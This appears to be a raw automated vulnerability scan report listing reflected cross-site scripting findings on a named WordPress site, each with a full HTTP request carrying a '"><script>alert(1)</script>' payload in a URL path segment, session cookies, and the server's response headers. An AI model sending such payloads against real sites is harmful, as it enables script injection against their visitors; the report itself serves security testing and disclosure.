Set-Cookie: wpgb_visit_last_php-default=1296674585; expires=Thu, 02-Feb-2012 19:23:05 GMT; path=/
Last-Modified: Wed, 02 Feb 2011 19:23:05 GMT
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 53326
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" xml:lang="en-US">
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f66b5"><script>alert(1)</script>d1bdee06cb7 was submitted in the REST URL parameter 3. This input was echoed as f66b5\"><script>alert(1)</script>d1bdee06cb7 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /site/wp-content/pluginsf66b5"><script>alert(1)</script>d1bdee06cb7/wp-greet-box/js/functions.js HTTP/1.1
Host: wp-superslider.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: wpgb_visit_last-http://burp=Wed%20Feb%2002%202011%2009%3A46%3A33%20GMT-0600%20%28Central%20Standard%20Time%29; wpgb_visit_last_php-default=1296661497; __utmz=128106954.1296661566.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/14; bb2_screener_=1296661541+173.193.214.243; __utma=128106954.628123047.1296661566.1296661566.1296661566.1; __utmc=128106954; __utmb=128106954.1.10.1296661566;
Response
HTTP/1.1 404 Not Found
Date: Wed, 02 Feb 2011 19:23:06 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.12
X-Pingback: http://wp-superslider.com/site/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: bb2_screener_=1296674586+173.193.214.243; path=/
Set-Cookie: wpgb_visit_last_php-default=1296674587; expires=Thu, 02-Feb-2012 19:23:07 GMT; path=/
Last-Modified: Wed, 02 Feb 2011 19:23:07 GMT
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 53326
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" xml:lang="en-US">
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ed6b8"><script>alert(1)</script>914a3271a2e was submitted in the REST URL parameter 4. This input was echoed as ed6b8\"><script>alert(1)</script>914a3271a2e in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /site/wp-content/plugins/wp-greet-boxed6b8"><script>alert(1)</script>914a3271a2e/js/functions.js HTTP/1.1
Host: wp-superslider.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: wpgb_visit_last-http://burp=Wed%20Feb%2002%202011%2009%3A46%3A33%20GMT-0600%20%28Central%20Standard%20Time%29; wpgb_visit_last_php-default=1296661497; __utmz=128106954.1296661566.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/14; bb2_screener_=1296661541+173.193.214.243; __utma=128106954.628123047.1296661566.1296661566.1296661566.1; __utmc=128106954; __utmb=128106954.1.10.1296661566;
Response
HTTP/1.1 404 Not Found
Date: Wed, 02 Feb 2011 19:23:08 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.12
X-Pingback: http://wp-superslider.com/site/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: bb2_screener_=1296674588+173.193.214.243; path=/
Set-Cookie: wpgb_visit_last_php-default=1296674588; expires=Thu, 02-Feb-2012 19:23:08 GMT; path=/
Last-Modified: Wed, 02 Feb 2011 19:23:08 GMT
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 53326
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" xml:lang="en-US">
The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ad51d"><script>alert(1)</script>5ca530811f6 was submitted in the REST URL parameter 5. This input was echoed as ad51d\"><script>alert(1)</script>5ca530811f6 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /site/wp-content/plugins/wp-greet-box/jsad51d"><script>alert(1)</script>5ca530811f6/functions.js HTTP/1.1
Host: wp-superslider.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: wpgb_visit_last-http://burp=Wed%20Feb%2002%202011%2009%3A46%3A33%20GMT-0600%20%28Central%20Standard%20Time%29; wpgb_visit_last_php-default=1296661497; __utmz=128106954.1296661566.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/14; bb2_screener_=1296661541+173.193.214.243; __utma=128106954.628123047.1296661566.1296661566.1296661566.1; __utmc=128106954; __utmb=128106954.1.10.1296661566;
Response
HTTP/1.1 404 Not Found
Date: Wed, 02 Feb 2011 19:23:09 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.12
X-Pingback: http://wp-superslider.com/site/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: bb2_screener_=1296674589+173.193.214.243; path=/
Set-Cookie: wpgb_visit_last_php-default=1296674589; expires=Thu, 02-Feb-2012 19:23:09 GMT; path=/
Last-Modified: Wed, 02 Feb 2011 19:23:09 GMT
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 53326
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" xml:lang="en-US">
The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 57ecd"><script>alert(1)</script>b9142a98a09 was submitted in the REST URL parameter 6. This input was echoed as 57ecd\"><script>alert(1)</script>b9142a98a09 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /site/wp-content/plugins/wp-greet-box/js/functions.js57ecd"><script>alert(1)</script>b9142a98a09 HTTP/1.1
Host: wp-superslider.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: wpgb_visit_last-http://burp=Wed%20Feb%2002%202011%2009%3A46%3A33%20GMT-0600%20%28Central%20Standard%20Time%29; wpgb_visit_last_php-default=1296661497; __utmz=128106954.1296661566.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/14; bb2_screener_=1296661541+173.193.214.243; __utma=128106954.628123047.1296661566.1296661566.1296661566.1; __utmc=128106954; __utmb=128106954.1.10.1296661566;
Response
HTTP/1.1 404 Not Found
Date: Wed, 02 Feb 2011 19:23:10 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.12
X-Pingback: http://wp-superslider.com/site/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: bb2_screener_=1296674590+173.193.214.243; path=/
Set-Cookie: wpgb_visit_last_php-default=1296674590; expires=Thu, 02-Feb-2012 19:23:10 GMT; path=/
Last-Modified: Wed, 02 Feb 2011 19:23:10 GMT
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 53325
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" xml:lang="en-US">
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d991d"><script>alert(1)</script>e1f4eeb27fb was submitted in the REST URL parameter 1. This input was echoed as d991d\"><script>alert(1)</script>e1f4eeb27fb in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /sited991d"><script>alert(1)</script>e1f4eeb27fb/wp-content/plugins/wp-greet-box/js/js-mode.js HTTP/1.1
Host: wp-superslider.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: wpgb_visit_last-http://burp=Wed%20Feb%2002%202011%2009%3A46%3A33%20GMT-0600%20%28Central%20Standard%20Time%29; wpgb_visit_last_php-default=1296661497; __utmz=128106954.1296661566.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/14; bb2_screener_=1296661541+173.193.214.243; __utma=128106954.628123047.1296661566.1296661566.1296661566.1; __utmc=128106954; __utmb=128106954.1.10.1296661566;
Response
HTTP/1.1 404 Not Found
Date: Wed, 02 Feb 2011 19:23:05 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.12
X-Pingback: http://wp-superslider.com/site/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: bb2_screener_=1296674586+173.193.214.243; path=/
Set-Cookie: wpgb_visit_last_php-default=1296674586; expires=Thu, 02-Feb-2012 19:23:06 GMT; path=/
Last-Modified: Wed, 02 Feb 2011 19:23:06 GMT
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 53320
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" xml:lang="en-US">
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9dcbb"><script>alert(1)</script>2a34ec876cb was submitted in the REST URL parameter 2. This input was echoed as 9dcbb\"><script>alert(1)</script>2a34ec876cb in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /site/wp-content9dcbb"><script>alert(1)</script>2a34ec876cb/plugins/wp-greet-box/js/js-mode.js HTTP/1.1
Host: wp-superslider.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: wpgb_visit_last-http://burp=Wed%20Feb%2002%202011%2009%3A46%3A33%20GMT-0600%20%28Central%20Standard%20Time%29; wpgb_visit_last_php-default=1296661497; __utmz=128106954.1296661566.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/14; bb2_screener_=1296661541+173.193.214.243; __utma=128106954.628123047.1296661566.1296661566.1296661566.1; __utmc=128106954; __utmb=128106954.1.10.1296661566;
Response
HTTP/1.1 404 Not Found
Date: Wed, 02 Feb 2011 19:23:07 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.12
X-Pingback: http://wp-superslider.com/site/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: bb2_screener_=1296674587+173.193.214.243; path=/
Set-Cookie: wpgb_visit_last_php-default=1296674587; expires=Thu, 02-Feb-2012 19:23:07 GMT; path=/
Last-Modified: Wed, 02 Feb 2011 19:23:07 GMT
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 53320
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" xml:lang="en-US">
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 11566"><script>alert(1)</script>61a3ae9d618 was submitted in the REST URL parameter 3. This input was echoed as 11566\"><script>alert(1)</script>61a3ae9d618 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /site/wp-content/plugins11566"><script>alert(1)</script>61a3ae9d618/wp-greet-box/js/js-mode.js HTTP/1.1
Host: wp-superslider.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: wpgb_visit_last-http://burp=Wed%20Feb%2002%202011%2009%3A46%3A33%20GMT-0600%20%28Central%20Standard%20Time%29; wpgb_visit_last_php-default=1296661497; __utmz=128106954.1296661566.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/14; bb2_screener_=1296661541+173.193.214.243; __utma=128106954.628123047.1296661566.1296661566.1296661566.1; __utmc=128106954; __utmb=128106954.1.10.1296661566;
Response
HTTP/1.1 404 Not Found
Date: Wed, 02 Feb 2011 19:23:09 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.12
X-Pingback: http://wp-superslider.com/site/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: bb2_screener_=1296674589+173.193.214.243; path=/
Set-Cookie: wpgb_visit_last_php-default=1296674589; expires=Thu, 02-Feb-2012 19:23:09 GMT; path=/
Last-Modified: Wed, 02 Feb 2011 19:23:09 GMT
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 53320
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" xml:lang="en-US">
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 55fe0"><script>alert(1)</script>4774902bb5d was submitted in the REST URL parameter 4. This input was echoed as 55fe0\"><script>alert(1)</script>4774902bb5d in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /site/wp-content/plugins/wp-greet-box55fe0"><script>alert(1)</script>4774902bb5d/js/js-mode.js HTTP/1.1
Host: wp-superslider.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: wpgb_visit_last-http://burp=Wed%20Feb%2002%202011%2009%3A46%3A33%20GMT-0600%20%28Central%20Standard%20Time%29; wpgb_visit_last_php-default=1296661497; __utmz=128106954.1296661566.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/14; bb2_screener_=1296661541+173.193.214.243; __utma=128106954.628123047.1296661566.1296661566.1296661566.1; __utmc=128106954; __utmb=128106954.1.10.1296661566;
Response
HTTP/1.1 404 Not Found
Date: Wed, 02 Feb 2011 19:23:10 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.12
X-Pingback: http://wp-superslider.com/site/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: bb2_screener_=1296674590+173.193.214.243; path=/
Set-Cookie: wpgb_visit_last_php-default=1296674590; expires=Thu, 02-Feb-2012 19:23:10 GMT; path=/
Last-Modified: Wed, 02 Feb 2011 19:23:10 GMT
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 53320
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" xml:lang="en-US">
The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7a63a"><script>alert(1)</script>48ff1601d51 was submitted in the REST URL parameter 5. This input was echoed as 7a63a\"><script>alert(1)</script>48ff1601d51 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /site/wp-content/plugins/wp-greet-box/js7a63a"><script>alert(1)</script>48ff1601d51/js-mode.js HTTP/1.1
Host: wp-superslider.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: wpgb_visit_last-http://burp=Wed%20Feb%2002%202011%2009%3A46%3A33%20GMT-0600%20%28Central%20Standard%20Time%29; wpgb_visit_last_php-default=1296661497; __utmz=128106954.1296661566.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/14; bb2_screener_=1296661541+173.193.214.243; __utma=128106954.628123047.1296661566.1296661566.1296661566.1; __utmc=128106954; __utmb=128106954.1.10.1296661566;
Response
HTTP/1.1 404 Not Found
Date: Wed, 02 Feb 2011 19:23:11 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.12
X-Pingback: http://wp-superslider.com/site/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: bb2_screener_=1296674591+173.193.214.243; path=/
Set-Cookie: wpgb_visit_last_php-default=1296674592; expires=Thu, 02-Feb-2012 19:23:12 GMT; path=/
Last-Modified: Wed, 02 Feb 2011 19:23:12 GMT
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 53320
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" xml:lang="en-US">
The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b9a1b"><script>alert(1)</script>9fec7095d88 was submitted in the REST URL parameter 6. This input was echoed as b9a1b\"><script>alert(1)</script>9fec7095d88 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /site/wp-content/plugins/wp-greet-box/js/js-mode.jsb9a1b"><script>alert(1)</script>9fec7095d88 HTTP/1.1
Host: wp-superslider.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: wpgb_visit_last-http://burp=Wed%20Feb%2002%202011%2009%3A46%3A33%20GMT-0600%20%28Central%20Standard%20Time%29; wpgb_visit_last_php-default=1296661497; __utmz=128106954.1296661566.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/14; bb2_screener_=1296661541+173.193.214.243; __utma=128106954.628123047.1296661566.1296661566.1296661566.1; __utmc=128106954; __utmb=128106954.1.10.1296661566;
Response
HTTP/1.1 404 Not Found
Date: Wed, 02 Feb 2011 19:23:12 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.12
X-Pingback: http://wp-superslider.com/site/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: bb2_screener_=1296674593+173.193.214.243; path=/
Set-Cookie: wpgb_visit_last_php-default=1296674593; expires=Thu, 02-Feb-2012 19:23:13 GMT; path=/
Last-Modified: Wed, 02 Feb 2011 19:23:13 GMT
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 53320
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" xml:lang="en-US">
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8b57e"><script>alert(1)</script>980c007698c was submitted in the REST URL parameter 1. This input was echoed as 8b57e\"><script>alert(1)</script>980c007698c in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /site8b57e"><script>alert(1)</script>980c007698c/wp-includes/js/jquery/jquery.js HTTP/1.1
Host: wp-superslider.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: wpgb_visit_last-http://burp=Wed%20Feb%2002%202011%2009%3A46%3A33%20GMT-0600%20%28Central%20Standard%20Time%29; wpgb_visit_last_php-default=1296661497; __utmz=128106954.1296661566.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/14; bb2_screener_=1296661541+173.193.214.243; __utma=128106954.628123047.1296661566.1296661566.1296661566.1; __utmc=128106954; __utmb=128106954.1.10.1296661566;
Response
HTTP/1.1 404 Not Found
Date: Wed, 02 Feb 2011 19:23:08 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.12
X-Pingback: http://wp-superslider.com/site/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: bb2_screener_=1296674588+173.193.214.243; path=/
Set-Cookie: wpgb_visit_last_php-default=1296674589; expires=Thu, 02-Feb-2012 19:23:09 GMT; path=/
Last-Modified: Wed, 02 Feb 2011 19:23:09 GMT
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 53278
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" xml:lang="en-US">
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 92397"><script>alert(1)</script>c46e27cc235 was submitted in the REST URL parameter 2. This input was echoed as 92397\"><script>alert(1)</script>c46e27cc235 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /site/wp-includes92397"><script>alert(1)</script>c46e27cc235/js/jquery/jquery.js HTTP/1.1
Host: wp-superslider.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: wpgb_visit_last-http://burp=Wed%20Feb%2002%202011%2009%3A46%3A33%20GMT-0600%20%28Central%20Standard%20Time%29; wpgb_visit_last_php-default=1296661497; __utmz=128106954.1296661566.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/14; bb2_screener_=1296661541+173.193.214.243; __utma=128106954.628123047.1296661566.1296661566.1296661566.1; __utmc=128106954; __utmb=128106954.1.10.1296661566;
Response
HTTP/1.1 404 Not Found
Date: Wed, 02 Feb 2011 19:23:09 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.12
X-Pingback: http://wp-superslider.com/site/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: bb2_screener_=1296674590+173.193.214.243; path=/
Set-Cookie: wpgb_visit_last_php-default=1296674590; expires=Thu, 02-Feb-2012 19:23:10 GMT; path=/
Last-Modified: Wed, 02 Feb 2011 19:23:10 GMT
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 53277
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" xml:lang="en-US">
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d415c"><script>alert(1)</script>2dc76faa4af was submitted in the REST URL parameter 3. This input was echoed as d415c\"><script>alert(1)</script>2dc76faa4af in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /site/wp-includes/jsd415c"><script>alert(1)</script>2dc76faa4af/jquery/jquery.js HTTP/1.1
Host: wp-superslider.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: wpgb_visit_last-http://burp=Wed%20Feb%2002%202011%2009%3A46%3A33%20GMT-0600%20%28Central%20Standard%20Time%29; wpgb_visit_last_php-default=1296661497; __utmz=128106954.1296661566.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/14; bb2_screener_=1296661541+173.193.214.243; __utma=128106954.628123047.1296661566.1296661566.1296661566.1; __utmc=128106954; __utmb=128106954.1.10.1296661566;
Response
HTTP/1.1 404 Not Found
Date: Wed, 02 Feb 2011 19:23:11 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.12
X-Pingback: http://wp-superslider.com/site/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: bb2_screener_=1296674591+173.193.214.243; path=/
Set-Cookie: wpgb_visit_last_php-default=1296674591; expires=Thu, 02-Feb-2012 19:23:11 GMT; path=/
Last-Modified: Wed, 02 Feb 2011 19:23:11 GMT
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 53276
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" xml:lang="en-US">
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d4e83"><script>alert(1)</script>db25147c9c7 was submitted in the REST URL parameter 4. This input was echoed as d4e83\"><script>alert(1)</script>db25147c9c7 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /site/wp-includes/js/jqueryd4e83"><script>alert(1)</script>db25147c9c7/jquery.js HTTP/1.1
Host: wp-superslider.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: wpgb_visit_last-http://burp=Wed%20Feb%2002%202011%2009%3A46%3A33%20GMT-0600%20%28Central%20Standard%20Time%29; wpgb_visit_last_php-default=1296661497; __utmz=128106954.1296661566.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/14; bb2_screener_=1296661541+173.193.214.243; __utma=128106954.628123047.1296661566.1296661566.1296661566.1; __utmc=128106954; __utmb=128106954.1.10.1296661566;
Response
HTTP/1.1 404 Not Found
Date: Wed, 02 Feb 2011 19:23:12 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.12
X-Pingback: http://wp-superslider.com/site/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: bb2_screener_=1296674592+173.193.214.243; path=/
Set-Cookie: wpgb_visit_last_php-default=1296674593; expires=Thu, 02-Feb-2012 19:23:13 GMT; path=/
Last-Modified: Wed, 02 Feb 2011 19:23:13 GMT
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 53277
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" xml:lang="en-US">
The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9baba"><script>alert(1)</script>5354db22a2c was submitted in the REST URL parameter 5. This input was echoed as 9baba\"><script>alert(1)</script>5354db22a2c in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /site/wp-includes/js/jquery/jquery.js9baba"><script>alert(1)</script>5354db22a2c HTTP/1.1
Host: wp-superslider.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
